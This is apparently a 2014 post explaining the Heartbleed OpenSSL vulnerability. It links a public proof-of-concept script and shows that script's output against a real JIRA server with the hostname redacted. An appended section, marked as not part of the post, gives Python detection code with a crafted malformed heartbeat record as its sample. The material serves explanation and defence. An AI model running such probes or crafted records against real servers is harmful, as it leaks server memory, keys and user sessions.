Posted by Cyber Wizard on 04/14/2014 01:26:35
The Heartbleed issue is actually worse than it might immediately seem (and it seems pretty bad already).
In case you've been out of the loop, Heartbleed (CVE-2014-0160) is a vulnerability in OpenSSL that allows any remote user to dump some of the contents of the server's memory. And yes, that's really bad. The major concern is that a skilled user could craft an exploit that dumps the RSA private key the server is using to communicate with its clients. The level of knowledge / skill required to craft this attack isn't particularly high, but it is likely out of reach for the average script kiddie.
So why is Heartbleed worse than you think? It's simple: the currently-available proof-of-concept scripts allow any client, anywhere in the world, to perform a session hijacking attack against a logged-in user.
As of this morning, the most widely-shared proof-of-concept is this simple Python script: https://gist.github.com/takeshixx/10107280.
With this script, anyone in the world can dump a bit of RAM from a vulnerable server.
Let's have a look at the output of this utility against a vulnerable server running the JIRA ticket tracking system. The hex output has been removed to improve readability.
[matt@laptop ~]# python heartbleed.py jira.XXXXXXXXXXX.com
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 3239
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
(lots of garbage)
WARNING: server returned more data than it should - server is vulnerable!
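What the fixed OpenSSL does that the vulnerable versions did not is the one bounds check below, shown here as an added Python example (not code from this post or from the linked PoC): parse the TLS record, then refuse any heartbeat whose declared payload length, plus its header and the 16 bytes of padding RFC 6520 requires, does not fit inside the bytes actually received. The same check is what a network sensor applies to flag an attempt. The two sample records are constructed for the example, not captured traffic.

```python
import struct

TLS_HEARTBEAT = 24           # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16             # RFC 6520: a heartbeat carries at least 16 bytes of padding


def parse_tls_record(data: bytes):
    """Split one TLS record into (content_type, version, fragment)."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    ctype, version, length = struct.unpack("!BHH", data[:5])
    fragment = data[5:5 + length]
    if len(fragment) != length:
        raise ValueError("record length field exceeds bytes on the wire")
    return ctype, version, fragment


def check_heartbeat(record: bytes):
    """Return (ok, reason); ok is False for a Heartbleed-style heartbeat.

    The decisive test is the one added to OpenSSL in 1.0.1g: the length the
    sender *claims* for its payload must fit in the fragment it *sent*.
    A vulnerable server skipped this and copied payload_len bytes from memory
    starting at a 3-byte message, leaking whatever followed it.
    """
    ctype, _version, frag = parse_tls_record(record)
    if ctype != TLS_HEARTBEAT:
        return True, "not a heartbeat record"
    if len(frag) < 3:
        return False, "heartbeat message shorter than its 3-byte header"
    hb_type, payload_len = struct.unpack("!BH", frag[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return False, "unknown heartbeat type %d" % hb_type
    if 1 + 2 + payload_len + MIN_PADDING > len(frag):
        return False, ("declared payload %d bytes but only %d bytes received"
                       % (payload_len, len(frag)))
    return True, "well-formed heartbeat"


# Constructed sample records (TLS 1.1 = 0x0302, as in the output above).
# Well-formed request: 3-byte payload "abc", declared length 3, 16 bytes padding.
GOOD_RECORD = bytes.fromhex("1803020016" "010003" "616263") + b"\x00" * 16
# Malformed request of the kind the PoC sends: declared length 0x4000 (16384)
# but the fragment is only the 3-byte header, matching the 16384-byte response.
BLEED_RECORD = bytes.fromhex("1803020003" "014000")

if __name__ == "__main__":
    for name, rec in (("good", GOOD_RECORD), ("bleed", BLEED_RECORD)):
        print(name, check_heartbeat(rec))
```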